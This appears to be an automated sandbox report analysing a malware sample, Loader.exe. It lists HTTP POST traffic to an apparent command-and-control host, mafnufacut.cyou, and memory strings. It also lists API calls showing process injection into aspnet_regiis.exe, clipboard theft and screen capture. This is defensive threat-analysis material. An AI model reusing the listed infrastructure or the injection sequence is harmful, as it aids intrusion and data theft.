              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1142Host: mafnufacut.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: mafnufacut.cyou
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: mafnufacut.cyou
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mafnufacut.cyou
              Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: aspnet_regiis.exe, 00000003.00000003.2181734798.0000000005B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: aspnet_regiis.exe, 00000003.00000003.2224998411.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168775207.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168503506.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236960687.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168731170.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2214118301.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168437867.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168539185.0000000005B05000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2213943534.0000000005AFF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168486617.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2198964863.0000000005AFF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2183061646.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2196049342.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2181667282.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2198830822.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2181132499.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2195854584.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168815356.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2213899457.0000000005AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/
              Source: aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/2U
              Source: aspnet_regiis.exe, 00000003.00000003.2154322168.000000000368B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/A
              Source: aspnet_regiis.exe, 00000003.00000003.2198830822.0000000005B0C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2195854584.0000000005B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/The
              Source: aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/api
              Source: aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/apiZ
              Source: aspnet_regiis.exe, 00000003.00000002.2236456187.00000000035EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/apiu
              Source: aspnet_regiis.exe, 00000003.00000003.2224953764.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236960687.0000000005B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/gra
              Source: aspnet_regiis.exe, 00000003.00000003.2168503506.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168437867.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168539185.0000000005B05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/h
              Source: aspnet_regiis.exe, 00000003.00000003.2180903731.0000000005B08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/nkkpib0
              Source: aspnet_regiis.exe, 00000003.00000003.2168503506.0000000005AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/p
              Source: aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/pi
              Source: aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/piE
              Source: aspnet_regiis.exe, 00000003.00000003.2224953764.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236960687.0000000005B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/r
              Source: aspnet_regiis.exe, 00000003.00000003.2180903731.0000000005B08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou/t7c5
              Source: aspnet_regiis.exe, 00000003.00000003.2183061646.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2181667282.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2181132499.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236456187.00000000035EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mafnufacut.cyou:443/api
              Source: aspnet_regiis.exe, 00000003.00000003.2183106829.0000000005C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: aspnet_regiis.exe, 00000003.00000003.2183106829.0000000005C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: aspnet_regiis.exe, 00000003.00000003.2154805607.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: aspnet_regiis.exe, 00000003.00000003.2182980628.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: aspnet_regiis.exe, 00000003.00000003.2182980628.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: aspnet_regiis.exe, 00000003.00000003.2183106829.0000000005C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: aspnet_regiis.exe, 00000003.00000003.2183106829.0000000005C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: aspnet_regiis.exe, 00000003.00000003.2183106829.0000000005C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.41.158:443 -> 192.168.2.6:49730 version: TLS 1.2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033C5210 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_033C5210
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033C5210 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_033C5210
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033C59B7 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_033C59B7

              System Summary

              barindex
              .NET source code contains very large array initializations
              Source: Loader.exe, -Module-.csLarge array initialization: _202B_200E_202E_206B_202D_206B_202B_206C_206A_202D_206B_206D_206F_206B_206A_206C_202B_206B_202A_206A_206D_200D_206C_206F_206E_200C_200E_202A_200B_202B_200D_206D_206B_206A_206C_200E_206C_200C_206C_202E_202E: array initializer size 62208
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E4F38A0 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,NtGetContextThread,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,0_2_6E4F38A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E4F3120 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,0_2_6E4F3120
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E4F38A00_2_6E4F38A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E4F31200_2_6E4F3120
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E4F11B00_2_6E4F11B0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E4F76500_2_6E4F7650
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E4F27600_2_6E4F2760
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E5030D50_2_6E5030D5
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E5146700_2_6E514670
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E5156600_2_6E515660
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E5486300_2_6E548630
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E50B6D50_2_6E50B6D5
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E5127400_2_6E512740
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E52BF400_2_6E52BF40
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E52AF060_2_6E52AF06
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E50B7280_2_6E50B728
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E51FFD80_2_6E51FFD8
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E5367E00_2_6E5367E0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E54C7800_2_6E54C780
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E51EFBF0_2_6E51EFBF
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E543FA00_2_6E543FA0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E54CC500_2_6E54CC50
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E513C450_2_6E513C45
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E50B4000_2_6E50B400
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E51EC2A0_2_6E51EC2A
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E50DCE00_2_6E50DCE0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E50F48B0_2_6E50F48B
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E543D400_2_6E543D40
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E511D600_2_6E511D60
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E54ED200_2_6E54ED20
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E52E5E00_2_6E52E5E0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E5212100_2_6E521210
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E534AD00_2_6E534AD0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E52CAA00_2_6E52CAA0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E517B600_2_6E517B60
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E5113600_2_6E511360
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E514B300_2_6E514B30
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E51B3EB0_2_6E51B3EB
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E51439C0_2_6E51439C
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E53F3800_2_6E53F380
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E54C3800_2_6E54C380
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E53F0600_2_6E53F060
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E5490200_2_6E549020
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E5290DE0_2_6E5290DE
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E5190C00_2_6E5190C0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E5180B00_2_6E5180B0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E5161700_2_6E516170
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E5299100_2_6E529910
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E5151D00_2_6E5151D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E53D9B00_2_6E53D9B0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA10B80_2_00DA10B8
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA41FC0_2_00DA41FC
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA59A00_2_00DA59A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA61780_2_00DA6178
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA3BD20_2_00DA3BD2
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA15400_2_00DA1540
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA25000_2_00DA2500
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA08C00_2_00DA08C0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA40110_2_00DA4011
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA100D0_2_00DA100D
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA59900_2_00DA5990
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA39100_2_00DA3910
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA39020_2_00DA3902
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA42590_2_00DA4259
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA3C8F0_2_00DA3C8F
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA3C420_2_00DA3C42
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA3C6D0_2_00DA3C6D
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA2DC80_2_00DA2DC8
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA2DB90_2_00DA2DB9
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA3D630_2_00DA3D63
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA3E820_2_00DA3E82
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA4FD80_2_00DA4FD8
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA4FE80_2_00DA4FE8
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00DA3FED0_2_00DA3FED
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_6E546B000_2_6E546B00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033BEB603_2_033BEB60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033CA2E03_2_033CA2E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033A01303_2_033A0130
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033A011A3_2_033A011A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033CA97E3_2_033CA97E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0339F9703_2_0339F970
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B68003_2_033B6800
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B509D3_2_033B509D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033A00C53_2_033A00C5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033D46203_2_033D4620
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033BA6D03_2_033BA6D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033AD5AF3_2_033AD5AF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0339132D3_2_0339132D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0339DB203_2_0339DB20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033983403_2_03398340
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B1B403_2_033B1B40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033A4BBF3_2_033A4BBF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033D33B03_2_033D33B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033C9BA03_2_033C9BA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033D23803_2_033D2380
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033BC3E03_2_033BC3E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033A5BD83_2_033A5BD8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033CE2303_2_033CE230
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B0A243_2_033B0A24
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0339A2703_2_0339A270
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033BCA723_2_033BCA72
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0339B2603_2_0339B260
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0339F2503_2_0339F250
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033BAA403_2_033BAA40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033AE2983_2_033AE298
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033912D53_2_033912D5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033D32C03_2_033D32C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033D49203_2_033D4920
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033979603_2_03397960
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033C99403_2_033C9940
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033C19803_2_033C1980
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B41E03_2_033B41E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B91E03_2_033B91E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033C31DE3_2_033C31DE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033D31D03_2_033D31D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033A482A3_2_033A482A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033910003_2_03391000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033D28503_2_033D2850
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033938E03_2_033938E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0339A7303_2_0339A730
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B94943_2_033B9494
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033D37203_2_033D3720
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033D17203_2_033D1720
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B8F003_2_033B8F00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0339D7603_2_0339D760
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03396F603_2_03396F60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B762D3_2_033B762D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03399FA83_2_03399FA8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03394FA03_2_03394FA0
